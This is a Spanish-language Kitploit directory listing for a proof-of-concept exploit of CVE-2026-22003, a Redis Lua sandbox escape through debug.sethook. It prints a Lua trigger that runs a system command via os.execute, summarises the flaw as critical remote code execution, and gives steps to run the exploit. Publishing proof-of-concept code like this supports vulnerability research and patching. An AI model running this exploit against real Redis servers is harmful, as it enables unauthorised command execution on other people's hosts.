Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-22003-Redis-Lua-Sandbox-Escape-via-debug.sethook- — Exploit de prueba de concepto para CVE-2026-22003 que demuestra la evasión del sandbox de Lua de Redis mediante debug.sethook para ejecutar comandos arbitrarios del sistema. | Kitploit
Herramientas/GitHubGitHub/george0papasotiriou/cve-2026-22003-redis-lua-sandbox-escape-via-debug.sethook-
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónSeguridad de Bases de DatosAtaque Adversario
GitHubgeorge0papasotiriou/cve-2026-22003-redis-lua-sandbox-escape-via-debug.sethook-

CVE-2026-22003-Redis-Lua-Sandbox-Escape-via-debug.sethook-

Exploit de prueba de concepto para CVE-2026-22003 que demuestra la evasión del sandbox de Lua de Redis mediante debug.sethook para ejecutar comandos arbitrarios del sistema.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 16 díasAún no revisado

CVE-2026-22003 – Escape del sandbox Lua de Redis mediante debug.sethook

Código del programa (disparador Lua + Python)

root@kitploit:~
-- redis_sandbox.lua - Script that attempts sandbox escape
local function escape()
  debug.sethook(function() 
    -- This hook runs in a privileged context
    os.execute("id > /tmp/redis_escape") 
  end, "r")
  local a = 1
end
return escape()

CVE-2026-22003 – Escape del sandbox Lua de Redis mediante debug.sethook

Severity: Critical

Resumen

El sandbox de Lua de Redis no deshabilita correctamente la función debug.sethook. Un atacante que pueda ejecutar scripts de Lua puede instalar un hook que se ejecuta en un contexto privilegiado y escapar del sandbox para ejecutar comandos arbitrarios del sistema.

Detalles de la vulnerabilidad

  • Tipo: Escape del sandbox
  • Impacto: Ejecución remota de código en el host de Redis.
  • Causa raíz: La biblioteca de depuración del entorno de Lua permanece accesible, lo que permite hooks que pueden llamar a os.execute o funciones similares.

Demostración del exploit

  1. Inicie un servidor Redis (con la configuración predeterminada que permite EVAL).
  2. Ejecute el exploit:
    root@kitploit:~
    pip install redis
    python trigger_redis_sandbox_escape.py
    

The file /tmp/redis_escape is created, proving command execution.


Descargar herramienta